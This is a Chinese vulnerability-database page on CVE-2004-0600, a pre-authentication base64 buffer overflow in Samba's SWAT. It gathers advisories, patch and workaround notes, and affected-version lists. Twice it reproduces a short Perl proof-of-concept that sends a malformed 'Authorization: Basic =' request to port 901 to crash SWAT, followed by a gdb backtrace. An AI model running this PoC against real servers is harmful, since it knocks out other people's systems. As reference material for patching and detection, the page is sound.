CVE-2004-0600
CVSS10.0
发布时间 :2004-07-27 00:00:00
修订时间 :2016-10-17 22:46:35
NMCOEPS    

[原文]Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an invalid base-64 character during HTTP basic authentication.


[CNNVD]Samba 3.x SWAT预验证远程缓冲区溢出漏洞(CNNVD-200407-053)

        
        SWAT是Samba Web管理工具。
        Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。
        问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中:
         int bit_offset, byte_offset, idx, i, n;
        ...
        ...
         if (*s == '=') n -= 1
         /* fix up length */
         decoded.length = n;
         return decoded;
        其中'n'定义为int.如果字符'='是最后一个数据,就会从'n'值中减一,此逻辑会在没有任何数据到达时出现问题或当值为1时,'n'减为零而没有相关的BASE64解码,产生基于整数的溢出。由于这个整数值会在之后进行memcpy()操作,因此精心构建提交数据可能以SWAT进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:samba:samba:3.0.4Samba 3.0.4
cpe:/a:samba:samba:3.0.3Samba 3.0.3
cpe:/a:samba:samba:3.0.2Samba 3.0.2
cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/a:samba:samba:3.0.2aSamba 3.0.2a
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11445Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0600
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0600
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-053
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000851
(UNKNOWN)  CONECTIVA  CLA-2004:851
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000854
(UNKNOWN)  CONECTIVA  CLA-2004:854
http://marc.info/?l=bugtraq&m=109051340810458&w=2
(UNKNOWN)  BUGTRAQ  20040722 Security Release - Samba 3.0.5 and 2.2.10
http://marc.info/?l=bugtraq&m=109051533021376&w=2
(UNKNOWN)  BUGTRAQ  20040722 [OpenPKG-SA-2004.033] OpenPKG Security Advisory (samba)
http://marc.info/?l=bugtraq&m=109052647928375&w=2
(UNKNOWN)  BUGTRAQ  20040722 Samba 3.x swat preauthentication buffer overflow
http://marc.info/?l=bugtraq&m=109052891507263&w=2
(UNKNOWN)  BUGTRAQ  20040722 TSSA-2004-014 - samba
http://marc.info/?l=bugtraq&m=109053195818351&w=2
(UNKNOWN)  BUGTRAQ  20040722 SWAT PreAuthorization PoC
http://www.gentoo.org/security/en/glsa/glsa-200407-21.xml
(UNKNOWN)  GENTOO  GLSA-200407-21
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:071
(UNKNOWN)  MANDRAKE  MDKSA-2004:071
http://www.novell.com/linux/security/advisories/2004_22_samba.html
(UNKNOWN)  SUSE  SUSE-SA:2004:022
http://www.redhat.com/support/errata/RHSA-2004-259.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:259
http://www.trustix.org/errata/2004/0039/
(UNKNOWN)  TRUSTIX  2004-0039
http://xforce.iss.net/xforce/xfdb/16785
(VENDOR_ADVISORY)  XF  samba-swat-base64-bo(16785)

- 漏洞信息

Samba 3.x SWAT预验证远程缓冲区溢出漏洞
危急 边界条件错误
2004-07-27 00:00:00 2005-10-20 00:00:00
远程  
        
        SWAT是Samba Web管理工具。
        Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。
        问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中:
         int bit_offset, byte_offset, idx, i, n;
        ...
        ...
         if (*s == '=') n -= 1
         /* fix up length */
         decoded.length = n;
         return decoded;
        其中'n'定义为int.如果字符'='是最后一个数据,就会从'n'值中减一,此逻辑会在没有任何数据到达时出现问题或当值为1时,'n'减为零而没有相关的BASE64解码,产生基于整数的溢出。由于这个整数值会在之后进行memcpy()操作,因此精心构建提交数据可能以SWAT进程权限执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭SWAT服务。
        厂商补丁:
        Samba
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Samba 3.0.5:
        
        http://www.samba.org/samba/whatsnew/samba-3.0.5.htm

- 漏洞信息 (364)

Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit (EDBID:364)
linux remote
2004-07-22 Verified
901 Noam Rathaus
N/A [点击下载]
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;

# milw0rm.com [2004-07-22]
		

- 漏洞信息 (F33855)

sambaPoC.txt (PacketStormID:F33855)
2004-07-23 00:00:00
Noam Rathaus  beyondsecurity.com
exploit,overflow,proof of concept
CVE-2004-0600
[点击下载]

Proof of concept exploit code for the Samba 3.x swat preauthentication buffer overflow vulnerability.

Hi,

The following is a brief proof of concept exploit code for the vulnerability 
mentioned in "Evgeny Demidov" <demidov@gleg.net>'s advisory: Samba 3.x swat 
preauthentication buffer overflow

Running the perl script against a vulnerable SWAT server will cause:
Program received signal SIGSEGV, Segmentation fault.
[Switching to process 30853]
0x410957af in memcpy () from /lib/tls/libc.so.6
(gdb) bt
#0  0x410957af in memcpy () from /lib/tls/libc.so.6
#1  0xbffff340 in ?? ()
#2  0x00000001 in ?? ()
#3  0x080e34e7 in ?? ()
#4  0xbffff5e5 in ?? ()
#5  0x082919a0 in ?? ()
#6  0xffffffff in ?? ()
#7  0x080e08f0 in ?? ()
#8  0x082919a0 in ?? ()
#9  0xffffffff in ?? ()
#10 0x080e7090 in ?? ()
#11 0x0c0b8fae in ?? ()
#12 0xbffff5e5 in ?? ()
#13 0x00000000 in ?? ()
#14 0xbffff5a8 in ?? ()
#15 0x0806c97d in ?? ()
#16 0xbffff5e5 in ?? ()
#17 0x0815fd76 in ?? ()
#18 0x00000006 in ?? ()
#19 0x41150ebc in ?? () from /lib/tls/libc.so.6
#20 0x081c8480 in ?? ()
#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6
#22 0xbffff3b4 in ?? ()
#23 0x081c8480 in ?? ()
#24 0x081c887f in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0xbffff3b4 in ?? ()
#28 0xbffff4cc in ?? ()
#29 0x00000400 in ?? ()
#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6
#31 0xbffff3b4 in ?? ()
#32 0x08162fd9 in ?? ()
#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6
#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6
#35 0x00000000 in ?? ()


Exploit:
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1\r
Host: $host:901\r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1\r
Accept: text/xml\r
Accept-Language: en-us,en;q=0.5\r
Accept-Encoding: gzip,deflate\r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r
Keep-Alive: 300\r
Connection: keep-alive\r
Authorization: Basic =\r
\r
";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

while (<$remote>)
{
 print $_;
}
print "\n";

close $remote;

-- 
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=44441
    

- 漏洞信息 (F33848)

sambaOverruns.txt (PacketStormID:F33848)
2004-07-22 00:00:00
 
advisory,web,overflow
CVE-2004-0600,CVE-2004-0686
[点击下载]

Samba versions greater or equal to 2.2.29 and 3.0.0 have a buffer overrun located in the code used to support the mangling method = hash smb.conf option. Versions 3.0.2 suffer from buffer overrun in an internal routine used to decode base64 data during HTTP basic authentication.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Summary:       Potential Buffer Overruns in Samba 3.0 and Samba 2.2
CVE ID:        CAN-2004-0600, CAN-2004-0686
~               (http://cve.mitre.org/)

- -------------
CAN-2004-0600
- -------------

Affected Versions:      >= v3.0.2

The internal routine used by the Samba Web Administration
Tool (SWAT v3.0.2 and later) to decode the base64 data
during HTTP basic authentication is subject to a buffer
overrun caused by an invalid base64 character.  It is
recommended that all Samba v3.0.2 or later installations
running SWAT either (a) upgrade to v3.0.5, or (b) disable
the swat administration service as a temporary workaround.

This same code is used internally to decode the
sambaMungedDial attribute value when using the ldapsam
passdb backend. While we do not believe that the base64
decoding routines used by the ldapsam passdb backend can
be exploited, sites using an LDAP directory service with
Samba are strongly encouraged to verify that the DIT only
allows write access to sambaSamAccount attributes by a
sufficiently authorized user.

The Samba Team would like to heartily thank Evgeny Demidov
for analyzing and reporting this bug.


- -------------
CAN-2004-0686
- -------------

Affected Versions:      >= v2.2.9, >= v3.0.0


A buffer overrun has been located in the code used to support
the 'mangling method = hash' smb.conf option.  Please be aware
that the default setting for this parameter in Samba 3 is
'mangling method = hash2' and therefore not vulnerable.

Affected Samba installations can avoid this possible security
bug by using the hash2 mangling method.  Server installations
requiring the hash mangling method are encouraged to upgrade
to Samba 3.0.5 (or 2.2.10).

~              --------------------------------------


Samba 3.0.5 and 2.2.10 are identical to the previous release
in each respective series with the exception of fixing these
issues. Samba 3.0.5rc1 has been removed from the download area
on Samba.org and 3.0.6rc2 will be available later this week.


The source code can be downloaded from :

~  http://download.samba.org/samba/ftp/

The uncompressed tarball and patch file have been signed
using GnuPG.  The Samba public key is available at

~  http://download.samba.org/samba/ftp/samba-pubkey.asc

Binary packages are available at

~  http://download.samba.org/samba/ftp/Binary_Packages/

The release notes are also available on-line at

~  http://www.samba.org/samba/whatsnew/samba-3.0.5.html
~  http://www.samba.org/samba/whatsnew/samba-2.2.10.html

Our code, Our bugs, Our responsibility.
(Samba Bugzilla -- https://bugzilla.samba.org/)


~                                  -- The Samba Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA/6GdIR7qMdg1EfYRAhGYAJ9wsFUb4+1Nu3shPQn12O5tXQAe1ACgvs6a
HxsnDPYXoL+q5UoYb6/2iJA=
=YCOV
-----END PGP SIGNATURE-----
    

- 漏洞信息

8190
Samba Web Administration Tool (SWAT) HTTP Basic Auth base64 Decoding Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Samba. The Samba Web Administration Tool (SWAT) fails to perform proper bounds checking when decoding base64 data during HTTP basic authentication resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-07-22 2004-04-28
Unknow Unknow

- 解决方案

Upgrade to version 3.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Samba Web Administration Tool Base64 Decoder Buffer Overflow Vulnerability
Boundary Condition Error 10780
Yes No
2004-07-22 12:00:00 2009-07-12 06:16:00
Evgeny Demidov is credited for discovering this issue.

- 受影响的程序版本

Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Linux 1.5
Trustix Secure Enterprise Linux 2.0
Samba Samba 3.0.4 -r1
Samba Samba 3.0.4
+ OpenPKG OpenPKG 2.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
+ Slackware Linux 10.0
Samba Samba 3.0.3
Samba Samba 3.0.2 a
Samba Samba 3.0.2
Samba Samba 3.0.1
Samba Samba 3.0 alpha
Samba Samba 3.0
+ Apple Mac OS X 10.3.2
+ Apple Mac OS X 10.3.2
+ Apple Mac OS X 10.3.1
+ Apple Mac OS X 10.3.1
+ Apple Mac OS X 10.3
+ Apple Mac OS X 10.3
+ Apple Mac OS X Server 10.3.2
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3
+ Apple Mac OS X Server 10.3
Samba Samba 2.2.8 a
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
Samba Samba 2.2.8
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.8
+ FreeBSD FreeBSD 4.8
+ FreeBSD FreeBSD 4.7
+ FreeBSD FreeBSD 4.7
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.6
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.2
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.2
Samba Samba 2.2.7 a
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 8.0
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 9.0 i386
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. Linux Personal 8.2
+ Slackware Linux 8.1
+ Slackware Linux 8.1
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 7.0
Samba Samba 2.2.7
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Sun Linux 5.0.6
+ Sun Solaris 9_x86
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun Solaris 9
Samba Samba 2.2.6
+ Mandriva Linux Mandrake 9.0
Samba Samba 2.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.2
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc3
+ HP CIFS/9000 Server A.01.09.02
+ HP CIFS/9000 Server A.01.09.01
+ HP CIFS/9000 Server A.01.09.01
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.07
+ HP CIFS/9000 Server A.01.07
+ HP CIFS/9000 Server A.01.06
+ HP CIFS/9000 Server A.01.06
+ HP CIFS/9000 Server A.01.05
+ HP CIFS/9000 Server A.01.05
+ OpenPKG OpenPKG 1.1
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.1
Samba Samba 2.2.5
+ RedHat Linux 8.0
Samba Samba 2.2.4
+ Slackware Linux 8.1
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.3 a
+ Conectiva Linux 8.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 8.0
Samba Samba 2.2.3
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X Server 10.2.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Samba Samba 2.2.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 7.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
+ HP CIFS/9000 Server A.01.09
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08.01
+ HP CIFS/9000 Server A.01.08
+ HP CIFS/9000 Server A.01.08
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ OpenPKG OpenPKG 1.0
+ OpenPKG OpenPKG 1.0
Samba Samba 2.2.1 a
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.3
+ Sun Linux 5.0
+ Sun LX50
Samba Samba 2.2.1 a
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3 i386
Samba Samba 2.2 a
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
Samba Samba 2.2 .0a
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
+ Slackware Linux 8.0
+ Slackware Linux 8.0
Samba Samba 2.2 .0
- S.u.S.E. Linux 7.2
Samba Samba 2.0.10
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1
+ Veritas Software ServPoint NAS 3.5
+ Veritas Software ServPoint NAS 1.2.2
+ Veritas Software ServPoint NAS 1.2.2
+ Veritas Software ServPoint NAS 1.2.1
+ Veritas Software ServPoint NAS 1.2.1
+ Veritas Software ServPoint NAS 1.2
+ Veritas Software ServPoint NAS 1.2
+ Veritas Software ServPoint NAS 1.1
+ Veritas Software ServPoint NAS 1.1
+ Wirex Immunix OS 7+
+ Wirex Immunix OS 7+
Samba Samba 2.0.9
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.4
- Apple Mac OS X Server 10.0
- Apple Mac OS X Server 10.0
- Caldera OpenLinux Server 3.1
- Caldera OpenLinux Workstation 3.1
- Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
+ Conectiva Linux 6.0
- Debian Linux 2.2
- Debian Linux 2.2
- Red Hat Linux 6.2
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.1
- RedHat Linux 7.0
- RedHat Linux 7.0
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4 alpha
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3 alpha
- S.u.S.E. Linux 6.3
- S.u.S.E. Linux 6.3
- Sun Solaris 8_x86
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 7.0
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.2
- Trustix Secure Linux 1.1
- Trustix Secure Linux 1.1
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
- Wirex Immunix OS 6.2
Samba Samba 2.0.8
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.4
- Conectiva Linux 6.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.1
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0 es
- Conectiva Linux 4.0
- Conectiva Linux 4.0
- Conectiva Linux graficas
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2 68k
- Debian Linux 2.2
- Debian Linux 2.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 i386
- RedHat Linux 7.1 alpha
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SCO eServer 2.3.1
- Sun Solaris 8_x86
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 8_sparc
